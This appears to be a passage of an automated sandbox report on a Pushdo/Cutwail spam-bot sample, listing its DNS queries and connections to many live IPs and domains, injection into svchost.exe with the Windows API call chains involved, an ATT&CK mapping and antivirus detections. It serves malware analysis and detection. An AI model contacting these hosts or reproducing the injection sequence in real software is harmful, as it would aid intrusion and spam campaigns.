Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 45.142.176.225 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ccrsi.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: snf.it
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cbaben.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.219.177.56 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: anduran.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: sinwal.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: likangds.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.ftchat.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: h-et-l.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 192.64.150.164 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: kursavto.ru
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: rkengg.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.205.70.128 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: madjek.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: wolffkran.de
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 103.4.16.43 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: wnit.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ntc.edu.au
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: acraloc.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: popbook.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: eos-i.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: revoldia.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: atb-lit.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: amele.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: uhsa.edu.ag
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: skgm.ru
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pleszew.policja.gov.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: icd-host.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.219.88.107 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.212.145.129 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 13.56.33.8 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: burstner.ru
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 35.154.163.204 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 34.205.242.146 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: xinhui.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.107.88.74 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: aluminox.es
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ie-roi.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mijash3.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 219.94.128.216 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: xult.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mail.protonmail.ch
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: shanks.co.uk
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.22.232.175 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 138.201.65.187 443
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 23.239.201.14 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: vivastay.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 59.106.13.169 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 49.212.235.175 443
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: e-asset.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.70.68.254 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 77.72.4.226 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: plaske.ua
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: touchfam.ca
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 154.88.50.199 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.yumgiskor.kz
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: indonesiamedia.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: a-domani.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: nettlinx.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: softizer.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: rokoron.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: k-nikko.com

Writes to foreign memory regions

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 28CA008	Jump to behavior
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B5B008	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DAB008	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 28E0008	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DCF008	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFF0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7E6E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EBD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5A	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\pigalicapi.exe

Thread APC queued: target process: C:\Windows\SysWOW64\svchost.exe

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Code function: 0_2_040020B0 GetEnvironmentVariableA,lstrcatA,lstrcatA,lstrcatA,VirtualAlloc,CreateProcessA,VirtualFree,VirtualAllocEx,VirtualAllocEx,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,VirtualFree,GetThreadContext,TerminateProcess,CloseHandle,CloseHandle,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,

0_2_040020B0

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04002510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,		0_2_04002510
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E2510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,		1_2_024E2510

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Code function: 0_2_0040D450 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0040D450

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

0_2_04008F80

Stealing of Sensitive Information

Yara detected Backdoor Pushdo

Source: Yara match	File source: 1.2.pigalicapi.exe.24c1e88.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.10004088.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.10004088.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.f11e88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.10004088.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.f11e88.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.f30000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.10004088.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.2790000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.10004088.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.4000000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.2791e88.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.2791e88.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.f10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.f10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.10004088.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.24c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.2790000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.24c1e88.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.4000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.671122999.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.642040224.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.642410962.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.669497358.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.651890416.0000000002790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.670270360.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Windows Service	1 Windows Service	111 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	21 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	711 Process Injection	21 Virtualization/Sandbox Evasion	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	711 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	25 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	15 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
6gjnnBAbpc.exe	18%	Virustotal		Browse
6gjnnBAbpc.exe	30%	ReversingLabs	Win32.Trojan.Cutwail
6gjnnBAbpc.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\pigalicapi.exe	100%	Joe Sandbox ML
C:\Users\user\pigalicapi.exe	30%	ReversingLabs	Win32.Trojan.Cutwail

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.3.svchost.exe.2fe0000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.3.svchost.exe.3aa0000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
10.2.svchost.exe.13140000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
22.2.svchost.exe.406b200.3.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.2.svchost.exe.13140000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
15.2.svchost.exe.13140000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
2.3.pigalicapi.exe.4770000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.svchost.exe.406b200.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.pigalicapi.exe.10010318.12.unpack	100%	Avira	TR/Downloader.Gen	Download File
12.2.svchost.exe.4004000.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
17.2.svchost.exe.7ebd0000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
16.2.svchost.exe.13140000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
0.2.6gjnnBAbpc.exe.c70000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.pigalicapi.exe.24c1e88.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.3.svchost.exe.55a0000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.pigalicapi.exe.f3e290.5.unpack	100%	Avira	TR/Downloader.Gen	Download File
0.2.6gjnnBAbpc.exe.10004088.14.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
19.2.svchost.exe.4000000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
11.2.svchost.exe.4000000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.2.pigalicapi.exe.10004088.11.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.2.svchost.exe.4050e00.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.2.svchost.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.3.6gjnnBAbpc.exe.b00000.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.pigalicapi.exe.10004088.11.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.6gjnnBAbpc.exe.c70000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.3.svchost.exe.56a0000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.svchost.exe.4050e00.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.3.svchost.exe.3bf0000.7.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.6gjnnBAbpc.exe.400e290.12.unpack	100%	Avira	TR/Downloader.Gen	Download File
1.3.pigalicapi.exe.29f0000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.2.svchost.exe.4004000.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.3.svchost.exe.3bf0000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.2.pigalicapi.exe.10010318.12.unpack	100%	Avira	TR/Downloader.Gen	Download File
6.2.svchost.exe.4050e00.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.3.svchost.exe.54a0000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.svchost.exe.4050e00.3.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.3.pigalicapi.exe.4740000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.pigalicapi.exe.24e0000.4.unpack	100%	Avira	TR/Spy.Gen	Download File
6.2.svchost.exe.4000000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.3.pigalicapi.exe.46f0000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.3.pigalicapi.exe.47212b9.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
7.2.svchost.exe.4000000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.2.svchost.exe.4000000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.2.svchost.exe.4000000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.2.pigalicapi.exe.f11e88.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.2.svchost.exe.13140000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
2.2.pigalicapi.exe.f30000.4.unpack	100%	Avira	TR/Spy.Gen	Download File
3.3.svchost.exe.54a0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
7.3.svchost.exe.54a0000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
18.2.svchost.exe.4000000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
6.3.svchost.exe.55a0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.3.pigalicapi.exe.46f04b9.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.6gjnnBAbpc.exe.2790000.6.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
6.2.svchost.exe.406b200.3.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
19.2.svchost.exe.13140000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
3.3.svchost.exe.3bf0000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
14.2.svchost.exe.13140000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
1.2.pigalicapi.exe.29f0000.8.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
21.2.svchost.exe.13140000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
0.2.6gjnnBAbpc.exe.3f50000.10.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.svchost.exe.4036a00.6.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.pigalicapi.exe.4770000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.svchost.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.svchost.exe.4004000.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
6.3.svchost.exe.54a0000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
21.2.svchost.exe.4000000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.3.svchost.exe.6e00000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.svchost.exe.4050e00.3.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.6gjnnBAbpc.exe.4000000.11.unpack	100%	Avira	TR/Spy.Gen	Download File
8.2.svchost.exe.7eff0000.1.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
7.3.svchost.exe.2fe0000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
22.2.svchost.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.pigalicapi.exe.2750000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.3.svchost.exe.2ff0000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.2.svchost.exe.406b200.6.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
22.2.svchost.exe.4036a00.6.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.6gjnnBAbpc.exe.2791e88.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.2.svchost.exe.4036a00.6.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.6gjnnBAbpc.exe.6a0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
18.2.svchost.exe.13140000.1.unpack	100%	Avira	TR/Proxy.Gen	Download File
6.3.svchost.exe.6e00000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.svchost.exe.4000000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
